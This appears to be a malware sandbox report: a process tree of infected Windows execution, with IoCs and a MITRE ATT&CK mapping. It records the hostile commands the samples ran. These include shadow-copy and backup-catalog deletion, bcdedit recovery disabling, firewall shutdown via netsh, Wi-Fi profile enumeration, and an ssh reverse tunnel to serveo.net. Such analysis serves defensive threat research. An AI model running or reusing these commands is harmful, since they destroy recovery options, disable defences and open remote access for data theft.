Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	aspnet_compiler.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196
- C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
  "C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
    C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
    3⤵
    PID:4148
- - C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
    C:\Users\Admin\AppData\Local\Temp\65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4256
- C:\Windows\system32\certreq.exe
  "C:\Windows\system32\certreq.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4796
- C:\Users\Admin\AppData\Local\Temp\6E45.exe
  C:\Users\Admin\AppData\Local\Temp\6E45.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3756
- - C:\Users\Admin\AppData\Local\Temp\6E45.exe
    C:\Users\Admin\AppData\Local\Temp\6E45.exe
    3⤵
    - Executes dropped EXE
    PID:4004
- - C:\Users\Admin\AppData\Local\Temp\6E45.exe
    C:\Users\Admin\AppData\Local\Temp\6E45.exe
    3⤵
    - Executes dropped EXE
    PID:4576
- C:\Users\Admin\AppData\Local\Temp\705A.exe
  C:\Users\Admin\AppData\Local\Temp\705A.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- - C:\Users\Admin\AppData\Local\Temp\705A.exe
    "C:\Users\Admin\AppData\Local\Temp\705A.exe"
    3⤵
    PID:4456
- C:\Users\Admin\AppData\Local\Temp\75DA.exe
  C:\Users\Admin\AppData\Local\Temp\75DA.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- - C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
    "C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"
    3⤵
    - Executes dropped EXE
    PID:4452
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:2888
- C:\Users\Admin\AppData\Local\Temp\73A6.exe
  C:\Users\Admin\AppData\Local\Temp\73A6.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    - Accesses Microsoft Outlook profiles
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
      4⤵
      PID:4276
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profiles
        5⤵
        
        PID:1816
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /C:"[ ]:[ ]"
        5⤵
        
        PID:5088
  - - C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
      "C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net
      4⤵
      PID:1464
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
      4⤵
      PID:2576
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        
        PID:1952
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SSID BSSID Signal"
        5⤵
        
        PID:2516
- C:\Users\Admin\AppData\Local\Temp\781D.exe
  C:\Users\Admin\AppData\Local\Temp\781D.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4480
- - C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
    "C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"
    3⤵
    - Executes dropped EXE
    PID:3604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:3816
- C:\Users\Admin\AppData\Local\Temp\8405.exe
  C:\Users\Admin\AppData\Local\Temp\8405.exe
  2⤵
  - Executes dropped EXE
  PID:548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1968
    3⤵
    - Program crash
    PID:3860
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1988
    3⤵
    - Program crash
    PID:4988
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  - Accesses Microsoft Outlook profiles
  PID:2636
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4956
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:752
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:4844
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:2116
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1424
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:3912
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:2188
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:4056
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:1372
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:1564
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:548
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:1256
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:4148
- C:\Windows\SysWOW64\explorer.exe
  C:\Windows\SysWOW64\explorer.exe
  2⤵
  PID:4284
- - C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe -debug
    3⤵
    PID:292
  - - C:\Windows\SYSTEM32\rundll32.exe
      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.dll",run
      4⤵
      PID:5136

C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
  C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3548
- - C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
    "C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
      C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe
      4⤵
      Executes dropped EXE
      PID:2184
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3716
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2516
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1348
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:276
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      Modifies Windows Firewall
      PID:3320
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode=disable
      4⤵
      Modifies Windows Firewall
      PID:4392

C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
"C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
  C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:212

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2468

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 548 -ip 548
1⤵
PID:2280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 548 -ip 548
1⤵
PID:2280

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Inhibit System Recovery